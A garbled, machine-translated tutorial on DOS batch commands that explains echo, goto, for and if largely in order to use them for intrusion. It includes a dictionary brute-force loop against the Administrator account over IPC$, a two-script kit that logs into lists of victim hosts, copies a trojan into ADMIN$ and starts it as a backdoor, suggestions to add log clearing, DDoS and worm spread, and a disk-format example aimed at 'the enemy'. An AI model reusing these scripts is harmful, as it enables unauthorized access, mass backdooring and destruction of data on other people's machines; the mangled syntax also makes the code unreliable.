DOS batch processing commands

1. Introduction to simple batch processing internal commands

1. Echo command
 
Enable or disable the request echo function or display messages. If no parameters exist, the echo command displays the current echo settings.

Syntax:
 
Echo [{ON │ off}] [Message]
Sample: @ echo off/ECHO Hello World

In actual application, we will combine this command with the redirection symbol (also known as the pipeline symbol) to achieve some input

To a file in a specific format. This will be reflected in future examples.

2. @ command

Indicates that the command after @ is not displayed. During the intrusion process (for example, you can use batch processing to format the enemy's hard disk ),

Command.
 
Sample: @ echo off
@ ECHO now initializing the program, please wait a Minite...
@ Format X:/Q/u/AutoSet (the/y parameter cannot be used for the format command. Fortunately, Microsoft has reserved an AutoSet

Parameters. The effect is the same as that of/Y .)

3. Goto command
 
Specify to jump to the tag. After finding the tag,ProgramThe command starting from the next line will be processed.

Syntax: goto label (label is a parameter that specifies the rows in the batch processing program to be switched .)
Sample:
If {% 1 }={} goto noparms
If {% 2 }={} goto noparms (if you do not understand the IF, % 1, and % 2 here, skip the step first, which will be explained in detail later .)
@ REM check parameters if null show usage
: Noparms
Echo usage: monitor. Bat serverip portnumber
Goto end

The name of a tag can be used as needed, but it is better to have a meaningful letter. Add a letter before it to indicate that the letter is a tag. The Goto command

Find the next step to jump there. It is better to have some explanations so that others seem to understand your intention.

4. Rem command

The annotation command is equivalent to/* -------- */in the C language. It is not executed, but serves as a comment for others to read and use.

Modify it later.
 
Rem message
Sample: @ REM here is the description.

5. Pause command

When running the pause command, the following message is displayed:
Press any key to continue...

Sample:
@ Echo off
: Begin
Copy A: *. * D: \ back
Echo please put a new disk into driver
Pause
Goto begin

In this example, all files on drive a are copied to drive D: \ back. The displayed comment prompts you to put another disk

When drive a, the pause command suspends the program so that you can change the disk and press any key to continue processing.

6. Call Command

Call another batch processing program from one batch processing program without terminating the parent batch processing program. Call Command accepts the label used as the call Target

. If a call is used outside a script or batch file, it does not work in the command line.
 
Syntax:
Call [[drive:] [path] filename [batchparameters] [: Label [arguments]

Parameters:
[Drive:} [path] filename

Specifies the location and name of the batch processing program to be called. The filename parameter must have the. bat or. CMD extension.

7. Start command

Call an external program. All the DOS commands and command line programs can be called by the START command.
Common parameters:
Minimum window size when Min starts
Separate starts a 16-bit windows program in a separate space
High starts applications in the high priority category
Realtime starts applications in the realtime priority category
Wait starts the application and waits for it to end
Parameters: these are parameters sent to the command/program.

When the executed application is a 32-bit GUI application, cmd. EXE returns a command prompt before the application is terminated. If

.
 
8. Choice command

Choice uses this command to allow users to enter a single character to run different commands. /C: parameter should be added for use, C: should be written later

It indicates the characters that can be entered, and there is no space between them. Its return code is 1234 ......

For example: choice/C: dimethyl defrag, mem, end

Will display
Defrag, mem, end [d, M, E]?

Sample:
The content of sample. bat is as follows:

@ Echo off
Choice/C: dimethyl defrag, mem, end
If errorlevel 3 goto defrag (the highest error code should be determined first)
If errorlevel 2 goto mem
If errotlevel 1 goto end

: Defrag
C: \ dos \ defrag
Goto end
: Mem
Mem
Goto end
: End
Echo good bye

After this file is run, defrag, mem, end [d, M, E]? You can select d m e, and then the if statement will make a judgment. d Indicates execution

The program segment marked as defrag, M indicates the program segment marked as MEM, and E indicates the program segment marked as end.

The program is jumped to the end label with Goto end, and the program will display good bye, and the file ends.

9. If command

If indicates whether the specified conditions are met, and then different commands are executed.

There are three formats:

1) if "parameter" = "string" command to be executed
If the parameter is equal to the specified string, the condition is true. Run the command. Otherwise, run the next sentence. (Note that there are two equal signs)

For example, if "% 1" = "A" format:
If {% 1 }={} goto noparms
If {% 2 }={} goto noparms

2) If exist file name command to be executed
If a specified file exists, the condition is true. Run the command. Otherwise, run the next sentence.
 
For example, if exist config. sys edit config. sys

3) If errorlevel/if not errorlevel number command to be executed
If the return code is equal to the specified number, the condition is true. Run the command. Otherwise, run the next sentence.
 
For example, if errorlevel 2 goto X2
 
When the DOS program runs, a number is returned to DOS, which is called the error level or return code. Common return codes are 0 and 1.

10. For command
 
The for command is a complex command. It is mainly used to execute commands cyclically within a specified range of parameters.
When using the for command in a batch file, use % variable to specify the variable

For {% variable │ % variable} In (SET) do command [commandlineoptions]
% Variable specifies a single letter replaceable parameter.
(SET) specifies one or more files. Wildcard characters can be used.
Command specifies the Command executed on each file.
Command-parameters specifies a parameter or command line switch for a specific command.

When using the for command in a batch file, use % variable to specify the variable
Instead of % variable. Variable names are case sensitive, so % I is different from % I

If the command extension is enabled, the following additional for command formats are supported:
For/d % variable in (SET) do command [command-parameters]

If the set contains wildcards, it is specified to match the directory name instead of the file name.

For/R [[drive:] path] % variable in (SET) do command [command-parameters]

Check the directory tree with [drive:] path as the root and point to the for statement in each directory. If no directory is specified after/R, use

Current directory. If the set is only a single point (.) character, the directory tree is enumerated.

For/L % variable in (START, step, end) do command [command-parameters]

This set indicates a sequence of numbers from start to end in incremental form.
Therefore, (, 5) will generate the sequence 1 2 3 4 5, (5,-) will generate
Sequence (5 4 3 2 1 ).

For/f ["options"] % variable in (file-set) do command
For/f ["options"] % variable in ("string") do command
For/f ["options"] % variable in ('command') do command

Or, if usebackq is available:

For/f ["options"] % variable in (file-set) do command
For/f ["options"] % variable in ("string") do command
For/f ["options"] % variable in ('command') do command

Filenameset is one or more file names. Before proceeding to the next file in filenameset, each file has been opened and read.

Obtain and process it.
Processing includes reading files, dividing them into lines of text, and parsing each line into zero or more symbols. Then use the found symbol

Variable values of string are called for loop. By default,/F uses the first blank symbol separated by each line of each file. Skip Blank

Line. You can specify the Optional options parameter to replace the default resolution operation. The quoted string contains one or more specified strings.

Keyword of the resolution option. These keywords are:

EOL = C-refers to the end of a line comment character (just one)
Skip = N-indicates the number of rows ignored at the beginning of the file.
Delims = xxx-refers to the delimiter set. This replaces the default delimiter set of spaces and the hop key.
Tokens = x, y, M-n-indicates which symbol of each row is passed to the for itself of each iteration. This causes
Format is a range. Use the nth symbol to specify the last character asterisks in the M Symbol string, then the additional variables will be in the last

To parse and accept the reserved Text of the row.
Usebackq-specify that the new syntax is used in the following situations:
Execute a character string followed by quotation marks as a text string in the command and allow double quotation marks to be expanded in file-set.

File Name.

Sample1:
For/F "EOL =; tokens = 2, 3 * delims =," % I in (myfile.txt) do command

Analyzes each row in myfile.txt, ignores the rows headers with semicolons, and passes the second and third symbols in each row to

Program body. Use commas (,) and/or spaces to specify the delimiter. Please note that the for program body statement references % I to obtain the second symbol, reference

% J to get the third symbol, reference % K to get all the remaining symbols after the third symbol. For file names with spaces, you must use

Double quotation marks enclose file names. To use double quotation marks in this way, you also need to use the usebackq option. Otherwise, double quotation marks will

It is understood that it is used to define a string to be analyzed.

% I is specifically described in the for statement. % J and % K are specifically described through the tokens = option. You can use tokens =

A row can contain up to 26 characters. If you do not try to figure out a variable higher than the 'z' or 'Z' letter. Remember that the for variable is a single word

Mother, case sensitive, and global. At the same time, no more than 52 characters are in use.

You can also use for/F to analyze the logic on adjacent strings. The method is to enclose the filenameset between parentheses with single quotation marks.

In this way, the string is treated as a single input line in a file.

Finally, you can use the for/F command to analyze the command output. The method is to convert the filenameset between the brackets into a backslash character.

String. This string will be passed to a sub-cmd. EXE as a command line, and its output will be captured into the memory andCompositionComponent analysis. Therefore

, For example:

For/F "usebackq delims =" % I in ('set') Do @ echo % I

The names of environment variables in the current environment are enumerated.

In addition, the replacement of the for variable reference has been enhanced. You can use the following syntax:

~ I-delete any quotation marks (") and expand % I
% ~ Fi-extend % I to a fully qualified path name
% ~ Di-only expand % I to one drive letter
% ~ Pi-only expand % I to one path
% ~ Ni-only expand % I to one file name
% ~ Xi-only expand % I to one file extension
% ~ The SI-extended path contains only short names.
% ~ Ai-extend % I to file attributes
% ~ Ti-extend % I to the date/time of the file
% ~ Zi-expand % I to the file size
% ~ $ Path: I-searches for the Directory of the environment variable in the path and expands % I to the first fully qualified name. If the environment changes

Volume is not defined, or the file is not found, this key combination expands the Null String

You can combine modifiers to get multiple results:

% ~ DPI-only expand % I to one drive letter and Path
% ~ Nxi-only expand % I to one file name and extension
% ~ FSI-only expand % I to a complete path name with a short name
% ~ DP $ path: I-searches the directory of the environment variable in the path and expands % I to the first drive letter and path found.
% ~ Ftzai-extended % I to the Dir similar to the output line

In the preceding example, % I and path can be replaced by other valid values. % ~ Syntax ends with a valid for variable name. Select similar

% I uppercase variable names are easier to read and avoid confusion with case-insensitive key combinations.

The above is the official help of Ms. Here are a few examples to illustrate the use of the for command in intrusion.

Sample2:

Use the for command to crack the brute-force password of a target Win2k host.
 
We use net use \ IP \ IPC $ "password"/u: "Administrator" to try this connection with the target host. When the connection succeeds, write down

Password.
The main command is: For/f I % in (dict.txt) Do net use \ IP \ IPC $ "I %"/u: "Administrator"
Use iadminto encrypt the adminpassword, and use the net use command to connect the I % value in dict.txt. Then pass the program running result

Find command --
For/f I % in (dict.txt) Do net use \ IP \ IPC $ "I %"/u: "Administrator" │ find ": Command successful

"> D: \ OK .txt.

Sample3:

Have you ever had a large number of bots waiting for you to plant backdoors and Trojans ?, When there are a large number of users, one thing that I was very happy with would be

Very depressing :).ArticleThe use of batch files can simplify daily or repetitive tasks. So how to implement it? Haha

You will understand it later.

There is only one main command: (when using the for command in the batch processing file, specify the variable to use % variable)
@ For/F "tokens = 1, 2, 3 delims =" % I in (victim.txt) do start call door. Bat % I % J % K
For the tokensusage method, see the example sample1. Here, upload the content in victim.txt to the parameters in door. BAT in sequence.

% I % J % K.
While the cultivate. bat is nothing more than using the net use command to establish the IPC $ connection, and copy the trojan + backdoor to victim, and then use the return code

(If errorlever =) to filter hosts that successfully planted backdoors, and echo them out, or echo them to the specified file.
The content in delims = effecvivtim.txt is separated by an empty space. I want to see the content in victim.txt.

What is it. It should be arranged according to the objects represented by % I % J % K, which is generally IP password username.

CodePrototype:
--------------- Cut here then save as a batchfile (I call it main. BAT )---------------------

------
@ Echo off
@ If "% 1" = "" Goto usage
@ For/F "tokens = 1, 2, 3 delims =" % I in (victim.txt) do start call ipchack. Bat % I % J % K
@ Goto end
: Usage
@ Echo run this batch in DOS modle. Or just double-click it.
: End
--------------- Cut here then save as a batchfile (I call it main. BAT )---------------------

------

----------------- Cut here then save as a batchfile (I call it door. BAT )------------------

-----------
@ Net use \ % 1 \ IPC $ % 3/u: "% 2"
@ If errorlevel 1 goto failed
@ Echo trying to establish the IPC $ connection ...... OK
@ Copy windrv32.exe \ % 1 \ ADMIN $ \ system32 & if not errorlevel 1 echo IP % 1 USER % 2 PWD % 3

> Ko.txt
@ Export xec \ % 1 c: \ winnt \ system32 \ windrv32.exe
@ Export xec \ % 1 Net start windrv32 & if not errorlevel 1 echo % 1 backdoored> ko.txt
: Failed
@ Echo sorry can not connected to the victim.
----------------- Cut here then save as a batchfile (I call it door. BAT )--------------------

This is just an example of automatic post-planting door batch processing. The two batch processing and post-door program (windrv32.exe.pdf, And the xec.exe should be placed in a unified

Directory. Batch content
Still scalable. For example, adding the log clearing + DDoS function and adding users regularly can enable automatic propagation.

Yes (worm). I will not describe it here. If you are interested, you can study it on your own.

2. How to Use parameters in batch files

Parameters can be used in batch processing, generally from 1% to 9%. shift is required when multiple parameters exist. This is rare.

We will not consider it.
 
Sample1: fomat. bat

@ Echo off
If "% 1" = "A" format:
: Format
@ Format A:/Q/u/auotset
@ Echo Please insert another disk to driver.
@ Pause
@ Goto fomat
This example is used to consecutively format several floppy disks. Therefore, you need to input fomat. bat a in the DOS window ~

Sample2:

When we want to establish an IPC $ connection location, we always need to input a large number of commands. If this is not the case, we will make a mistake, so we should put some fixed commands

Write a batch, and assign the IP password username of the broiler site to this batch in front of the parameter, so that you do not need to execute the command every time.

.
@ Echo off
@ Net use \ 1% \ IPC $ "2%"/u: "3%" NOTE: Here password is the second parameter.
@ If errorlevel 1 echo connection failed
How about using parameters? You must have learned how to be so handsome.